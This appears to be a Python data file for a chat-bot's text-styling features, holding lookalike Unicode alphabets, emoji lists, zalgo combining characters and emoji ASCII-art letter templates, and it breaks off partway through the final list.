superscriptfont = "ᴬᴮᶜᴰᴱᶠᴳᴴᴵᴶᴷᴸᴹᴺᴼᴾᵠᴿˢᵀᵁⱽᵂˣʸᶻᵃᵇᶜᵈᵉᶠᵍʰᶦʲᵏˡᵐⁿᵒᵖᵠʳˢᵗᵘᵛʷˣʸᶻ¹²³⁴⁵⁶⁷⁸⁹⁰\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
subscriptfont = "ₐBCDₑFGₕᵢⱼₖₗₘₙₒₚQᵣₛₜᵤᵥWₓYZₐᵦ𝒸𝒹ₑ𝒻𝓰ₕᵢⱼₖₗₘₙₒₚᵩᵣₛₜᵤᵥ𝓌ₓᵧ𝓏₁₂₃₄₅₆₇₈₉₀\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
bubblesfont = "ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏ1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
bubblesblackfont = "🅐🅑🅒🅓🅔🅕🅖🅗🅘🅙🅚🅛🅜🅝🅞🅟🅠🅡🅢🅣🅤🅥🅦🅧🅨🅩🅐🅑🅒🅓🅔🅕🅖🅗🅘🅙🅚🅛🅜🅝🅞🅟🅠🅡🅢🅣🅤🅥🅦🅧🅨🅩1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
smothtextfont = "ᗩᗷᑕᗞᗴᖴᏀᕼᏆᒍᏦᏞᗰᑎᝪᑭᑫᖇᔑᎢᑌᐯᗯ᙭ᎩᏃᗩᗷᑕᗞᗴᖴᏀᕼᏆᒍᏦᏞᗰᑎᝪᑭᑫᖇᔑᎢᑌᐯᗯ᙭ᎩᏃ1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
egyptfontfont = "ค๒ς๔єŦﻮђเןкl๓ภ๏קợгรtยשฬץאzค๒ς๔єŦﻮђเןкl๓ภ๏קợгรtยשฬץאz1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
hwslfont = "𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
nightmarefont = "𝖆𝖇𝖈𝖉𝖊𝖋𝖌𝖍𝖎𝖏𝖐𝖑𝖒𝖓𝖔𝖕𝖖𝖗𝖘𝖙𝖚𝖛𝖜𝖝𝖞𝖟𝖆𝖇𝖈𝖉𝖊𝖋𝖌𝖍𝖎𝖏𝖐𝖑𝖒𝖓𝖔𝖕𝖖𝖗𝖘𝖙𝖚𝖛𝖜𝖝𝖞𝖟1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
ghostfontfont = "𝕬𝕭𝕮𝕯𝕰𝕱𝕲𝕳𝕴𝕵𝕶𝕷𝕸𝕹𝕺𝕻𝕼𝕽𝕾𝕿𝖀𝖁𝖂𝖃𝖄𝖅𝕬𝕭𝕮𝕯𝕰𝕱𝕲𝕳𝕴𝕵𝕶𝕷𝕸𝕹𝕺𝕻𝕼𝕽𝕾𝕿𝖀𝖁𝖂𝖃𝖄𝖅1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
hwcapitalfont = "𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
tantextfont = "ᎯᏰᏣᎴᏋᎴᎶᏂiᏠᏦlmᏁᏫᎵᏄᖇᎦᎿᏌᏉᏯメᎩᏃᎯᏰᏣᎴᏋᎴᎶᏂiᏠᏦlmᏁᏫᎵᏄᖇᎦᎿᏌᏉᏯメᎩᏃ1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
littleboxtextfont = "🄰🄱🄲🄳🄴🄵🄶🄷🄸🄹🄺🄻🄼🄽🄾🄿🅀🅁🅂🅃🅄🅅🅆🅇🅈🅉🄰🄱🄲🄳🄴🄵🄶🄷🄸🄹🄺🄻🄼🄽🄾🄿🅀🅁🅂🅃🅄🅅🅆🅇🅈🅉1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
doubletextfont = "ᎯℬℂⅅℰℱᎶℋℐᎫᏦℒℳℕᎾℙℚℛЅᏆUᏉᏇXᎽℤᎯℬℂⅅℰℱᎶℋℐᎫᏦℒℳℕᎾℙℚℛЅᏆUᏉᏇXᎽℤ1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
upsidefont = [
"a",
"b",
"c",
"d",
"e",
"f",
"g",
"h",
"i",
"j",
"k",
"l",
"m",
"n",
"o",
"p",
"q",
"r",
"s",
"t",
"u",
"v",
"w",
"x",
"y",
"z",
"A",
"B",
"C",
"D",
"E",
"F",
"G",
"H",
"I",
"J",
"K",
"L",
"M",
"N",
"O",
"P",
"Q",
"R",
"S",
"T",
"U",
"V",
"W",
"X",
"Y",
"Z",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"_",
"'",
",",
"\\",
"/",
"!",
"?",
]
downsidefont = [
"ɐ",
"q",
"ɔ",
"p",
"ə",
"ɟ",
"ɓ",
"ɥ",
"ı",
"ɾ",
"ʞ",
"l",
"ɯ",
"u",
"o",
"p",
"q",
"ɹ",
"s",
"ʇ",
"n",
"ʌ",
"ʍ",
"x",
"ʎ",
"z",
"∀",
"B",
"Ↄ",
"◖",
"Ǝ",
"Ⅎ",
"⅁",
"H",
"I",
"ſ",
"K",
"⅂",
"W",
"ᴎ",
"O",
"Ԁ",
"Ό",
"ᴚ",
"S",
"⊥",
"∩",
"ᴧ",
"M",
"X",
"⅄",
"Z",
"0",
"1",
"ᄅ",
"Ɛ",
"ᔭ",
"5",
"9",
"Ɫ",
"8",
"6",
"¯",
",",
"'",
"/",
"\\",
"¡",
"¿",
]
ancientfont = [
"ꍏ",
"ꌃ",
"ꉓ",
"ꀸ",
"ꍟ",
"ꎇ",
"ꁅ",
"ꃅ",
"ꀤ",
"ꀭ",
"ꀘ",
"꒒",
"ꎭ",
"ꈤ",
"ꂦ",
"ᖘ",
"ꆰ",
"ꋪ",
"ꌗ",
"꓄",
"ꀎ",
"ᐯ",
"ꅏ",
"ꊼ",
"ꌩ",
"ꁴ",
"ꍏ",
"ꌃ",
"ꉓ",
"ꀸ",
"ꍟ",
"ꎇ",
"ꁅ",
"ꃅ",
"ꀤ",
"ꀭ",
"ꀘ",
"꒒",
"ꎭ",
"ꈤ",
"ꂦ",
"ᖘ",
"ꆰ",
"ꋪ",
"ꌗ",
"꓄",
"ꀎ",
"ᐯ",
"ꅏ",
"ꊼ",
"ꌩ",
"ꁴ",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"_",
"'",
",",
"\\",
"/",
"!",
"?",
]
normalfont = [
"a",
"b",
"c",
"d",
"e",
"f",
"g",
"h",
"i",
"j",
"k",
"l",
"m",
"n",
"o",
"p",
"q",
"r",
"s",
"t",
"u",
"v",
"w",
"x",
"y",
"z",
"A",
"B",
"C",
"D",
"E",
"F",
"G",
"H",
"I",
"J",
"K",
"L",
"M",
"N",
"O",
"P",
"Q",
"R",
"S",
"T",
"U",
"V",
"W",
"X",
"Y",
"Z",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"_",
"'",
",",
"\\",
"/",
"!",
"?",
]
musicalfont = [
"♬",
"ᖲ",
"¢",
"ᖱ",
"៩",
"⨏",
"❡",
"Ϧ",
"ɨ",
"ɉ",
"ƙ",
"ɭ",
"៣",
"⩎",
"០",
"ᖰ",
"ᖳ",
"Ʀ",
"ន",
"Ƭ",
"⩏",
"⩔",
"Ɯ",
"✗",
"ƴ",
"Ȥ",
"♬",
"ᖲ",
"¢",
"ᖱ",
"៩",
"⨏",
"❡",
"Ϧ",
"ɨ",
"ɉ",
"ƙ",
"ɭ",
"៣",
"⩎",
"០",
"ᖰ",
"ᖳ",
"Ʀ",
"ន",
"Ƭ",
"⩏",
"⩔",
"Ɯ",
"✗",
"ƴ",
"Ȥ",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"_",
"'",
",",
"\\",
"/",
"!",
"?",
]
normiefont = [
"a",
"b",
"c",
"d",
"e",
"f",
"g",
"h",
"i",
"j",
"k",
"l",
"m",
"n",
"o",
"p",
"q",
"r",
"s",
"t",
"u",
"v",
"w",
"x",
"y",
"z",
]
weebyfont = [
"卂",
"乃",
"匚",
"刀",
"乇",
"下",
"厶",
"卄",
"工",
"丁",
"长",
"乚",
"从",
"𠘨",
"口",
"尸",
"㔿",
"尺",
"丂",
"丅",
"凵",
"リ",
"山",
"乂",
"丫",
"乙",
]
EMOJIS = [
"😂",
"😂",
"👌",
"💞",
"👍",
"👌",
"💯",
"🎶",
"👀",
"😂",
"👓",
"👏",
"👐",
"🍕",
"💥",
"😩",
"😏",
"😞",
"👀",
"👅",
"😩",
"🤒",
"😳",
"🤯",
"😵",
"🥵",
"🤒",
"😠",
"😪",
"😴",
"🤤",
"👿",
"👽",
"😏",
"😒",
"😣",
"🤔",
"🤨",
"🧐",
"😝",
"🤪",
"🤩",
"☺️",
"😭",
"🥺",
]
ZALG_LIST = [
[
"̖",
" ̗",
" ̘",
" ̙",
" ̜",
" ̝",
" ̞",
" ̟",
" ̠",
" ̤",
" ̥",
" ̦",
" ̩",
" ̪",
" ̫",
" ̬",
" ̭",
" ̮",
" ̯",
" ̰",
" ̱",
" ̲",
" ̳",
" ̹",
" ̺",
" ̻",
" ̼",
" ͅ",
" ͇",
" ͈",
" ͉",
" ͍",
" ͎",
" ͓",
" ͔",
" ͕",
" ͖",
" ͙",
" ͚",
" ",
],
[
" ̍",
" ̎",
" ̄",
" ̅",
" ̿",
" ̑",
" ̆",
" ̐",
" ͒",
" ͗",
" ͑",
" ̇",
" ̈",
" ̊",
" ͂",
" ̓",
" ̈́",
" ͊",
" ͋",
" ͌",
" ̃",
" ̂",
" ̌",
" ͐",
" ́",
" ̋",
" ̏",
" ̽",
" ̉",
" ͣ",
" ͤ",
" ͥ",
" ͦ",
" ͧ",
" ͨ",
" ͩ",
" ͪ",
" ͫ",
" ͬ",
" ͭ",
" ͮ",
" ͯ",
" ̾",
" ͛",
" ͆",
" ̚",
],
[
" ̕",
" ̛",
" ̀",
" ́",
" ͘",
" ̡",
" ̢",
" ̧",
" ̨",
" ̴",
" ̵",
" ̶",
" ͜",
" ͝",
" ͞",
" ͟",
" ͠",
" ͢",
" ̸",
" ̷",
" ͡",
],
]
kakashitext = [
"a",
"b",
"c",
"d",
"e",
"f",
"g",
"h",
"i",
"j",
"k",
"l",
"m",
"n",
"o",
"p",
"q",
"r",
"s",
"t",
"u",
"v",
"w",
"x",
"y",
"z",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
]
kakashiemoji = [
"\n 💖\n 💖💖\n 💖💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖💖💖💖💖\n 💖💖💖💖💖💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n💖💖 💖💖\n",
"\n💗💗💗💗💗💗💗\n💗💗💗💗💗💗💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗💗💗💗💗💗💗\n💗💗💗💗💗💗💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗💗💗💗💗💗💗\n💗💗💗💗💗💗💗\n",
"\n 💛💛💛💛💛💛\n 💛💛💛💛💛💛💛💛\n 💛💛 💛💛\n 💛💛\n💛💛\n💛💛\n 💛💛\n 💛💛 💛💛\n 💛💛💛💛💛💛💛💛\n 💛💛💛💛💛💛\n",
"\n💙💙💙💙💙💙💙\n💙💙💙💙💙💙💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙💙💙💙💙💙💙\n💙💙💙💙💙💙💙\n",
"\n💟💟💟💟💟💟💟💟\n💟💟💟💟💟💟💟💟\n💟💟\n💟💟\n💟💟💟💟💟💟\n💟💟💟💟💟💟\n💟💟\n💟💟\n💟💟💟💟💟💟💟💟\n💟💟💟💟💟💟💟💟\n",
"\n💚💚💚💚💚💚💚💚\n💚💚💚💚💚💚💚💚\n💚💚\n💚💚\n💚💚💚💚💚💚\n💚💚💚💚💚💚\n💚💚\n💚💚\n💚💚\n💚💚\n",
"\n 💜💜💜💜💜💜\n 💜💜💜💜💜💜💜💜\n 💜💜 💜💜\n 💜💜\n💜💜 💜💜💜💜\n💜💜 💜💜💜💜\n 💜💜 💜💜\n 💜💜 💜💜\n 💜💜💜💜💜💜💜💜\n 💜💜💜💜💜💜\n",
"\n💖💖 💖💖\n💖💖 💖💖\n💖💖 💖💖\n💖💖 💖💖\n💖💖💖💖💖💖💖💖💖\n💖💖💖💖💖💖💖💖💖\n💖💖 💖💖\n💖💖 💖💖\n💖💖 💖💖\n💖💖 💖💖\n",
"\n💗💗💗💗💗💗\n💗💗💗💗💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n💗💗💗💗💗💗\n💗💗💗💗💗💗\n",
"\n 💛💛💛💛💛💛\n 💛💛💛💛💛💛\n 💛💛\n 💛💛\n 💛💛\n 💛💛\n💛💛 💛💛\n 💛💛 💛💛\n 💛💛💛💛💛\n 💛💛💛💛\n",
"\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n",
"\n💟💟\n💟💟\n💟💟\n💟💟\n💟💟\n💟💟\n💟💟\n💟💟\n💟💟💟💟💟💟💟💟\n💟💟💟💟💟💟💟💟\n",
"\n💚💚 💚💚\n💚💚💚 💚💚💚\n💚💚💚💚 💚💚💚💚\n💚💚 💚💚 💚💚 💚💚\n💚💚 💚💚💚 💚💚\n💚💚 💚 💚💚\n💚💚 💚💚\n💚💚 💚💚\n💚💚 💚💚\n💚💚 💚💚\n",
"\n💜💜 💜💜\n💜💜💜 💜💜\n💜💜💜💜 💜💜\n💜💜 💜💜 💜💜\n💜💜 💜💜 💜💜\n💜💜 💜💜 💜💜\n💜💜 💜💜 💜💜\n💜💜 💜💜💜💜\n💜💜 💜💜💜\n💜💜 💜💜\n",
"\n 💖💖💖💖💖\n 💖💖💖💖💖💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n💖💖 💖💖\n💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖💖💖💖💖💖\n 💖💖💖💖💖\n",
"\n💗💗💗💗💗💗💗\n💗💗💗💗💗💗💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗💗💗💗💗💗💗\n💗💗💗💗💗💗💗\n💗💗\n💗💗\n💗💗\n💗💗\n",
"\n 💛💛💛💛💛\n 💛💛💛💛💛💛💛\n 💛💛 💛💛\n 💛💛 💛💛\n💛💛 💛💛\n💛💛 💛💛 💛💛\n 💛💛 💛💛 💛💛\n 💛💛 💛💛\n 💛💛💛💛💛💛💛💛\n 💛💛💛💛💛 💛💛\n",
"\n💙💙💙💙💙💙💙\n💙💙💙💙💙💙💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙💙💙💙💙💙💙\n💙💙💙💙💙💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n",
"\n 💟💟💟💟💟\n 💟💟💟💟💟💟💟\n 💟💟 💟💟\n💟💟\n 💟💟💟💟💟💟\n 💟💟💟💟💟💟\n 💟💟\n💟💟 💟💟\n 💟💟💟💟💟💟💟\n 💟💟💟💟💟\n",
"\n💚💚💚💚💚💚💚💚\n💚💚💚💚💚💚💚💚\n 💚💚\n 💚💚\n 💚💚\n 💚💚\n 💚💚\n 💚💚\n 💚💚\n",
"\n💜💜 💜💜\n💜💜 💜💜\n💜💜 💜💜\n💜💜 💜💜\n💜💜 💜💜\n💜💜 💜💜\n💜💜 💜💜\n 💜💜 💜💜\n 💜💜💜💜💜💜\n 💜💜💜💜\n",
"\n💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖💖\n 💖\n",
"\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗 💗💗\n 💗💗 💗💗 💗💗\n 💗💗 💗💗💗 💗💗\n 💗💗 💗💗 💗💗 💗💗\n 💗💗💗💗 💗💗💗💗\n 💗💗💗 💗💗💗\n",
"\n💛💛 💛💛\n 💛💛 💛💛\n 💛💛 💛💛\n 💛💛 💛💛\n 💛💛💛\n 💛💛💛\n 💛💛 💛💛\n 💛💛 💛💛\n 💛💛 💛💛\n💛💛 💛💛\n",
"\n💙💙 💙💙\n 💙💙 💙💙\n 💙💙 💙💙\n 💙💙 💙💙\n 💙💙💙\n 💙💙\n 💙💙\n 💙💙\n 💙💙\n 💙💙\n",
"\n 💟💟💟💟💟💟💟\n 💟💟💟💟💟💟💟\n 💟💟\n 💟💟\n 💟💟\n 💟💟\n 💟💟\n 💟💟\n💟💟💟💟💟💟💟\n💟💟💟💟💟💟💟\n",
"\n 💗💗💗💗\n 💗💗💗💗💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗💗\n 💗💗💗💗💗💗\n 💗💗💗💗\n",
"\n 💙💙\n 💙💙💙\n💙💙 💙💙\n 💙💙\n 💙💙\n 💙💙\n 💙💙\n 💙💙\n 💙💙💙💙\n 💙💙💙💙\n",
"\n 💟💟💟💟💟\n 💟💟💟💟💟💟\n💟💟 💟💟\n 💟💟\n 💟💟\n 💟💟\n 💟💟\n 💟💟\n 💟💟💟💟💟💟\n 💟💟💟💟💟💟\n",
"\n 💛💛💛💛\n 💛💛💛💛💛\n💛💛 💛💛\n 💛💛\n 💛💛💛\n 💛💛💛\n 💛💛\n💛💛 💛💛\n 💛💛💛💛💛\n 💛💛💛💛\n",
"\n 💖💖\n 💖💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n💖💖 💖💖\n💖💖💖💖💖💖💖💖💖\n💖💖💖💖💖💖💖💖💖\n 💖💖\n 💖💖\n",
"\n💚💚💚💚💚💚\n💚💚💚💚💚💚\n💚💚\n 💚💚💚💚💚\n 💚💚💚💚💚\n 💚💚\n 💚💚\n💚💚 💚💚\n 💚💚💚💚💚\n 💚💚💚💚\n",
"\n 💜💜💜💜\n 💜💜💜💜💜\n💜💜\n\n💜💜\n💜💜💜💜💜💜\n💜💜💜💜💜💜💜\n💜💜 💜💜\n💜💜 💜💜\n 💜💜💜💜💜💜\n 💜💜💜💜\n",
"\n💗💗💗💗💗💗💗\n💗💗💗💗💗💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n",
"\n 💙💙💙💙\n 💙💙💙💙💙💙\n💙💙 💙💙\n💙💙 💙💙\n 💙💙💙💙💙💙\n 💙💙💙💙💙💙\n💙💙 💙💙\n💙💙 💙💙\n 💙💙💙💙💙💙\n 💙💙💙💙\n",
"\n 💟💟💟💟\n 💟💟💟💟💟💟\n💟💟 💟💟\n💟💟 💟💟\n 💟💟💟💟💟💟💟\n 💟💟💟💟💟💟\n 💟💟\n 💟💟\n 💟💟💟💟💟💟\n 💟💟💟💟\n",
]
itachiemoji = [
"\n {cj}\n {cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}\n{cj}{cj}\n{cj}{cj}\n {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}\n{cj}{cj} {cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj} {cj}{cj}{cj}\n{cj}{cj}{cj}{cj} {cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj} {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}{cj} {cj}{cj}\n{cj}{cj} {cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj} {cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}\n {cj}\n",
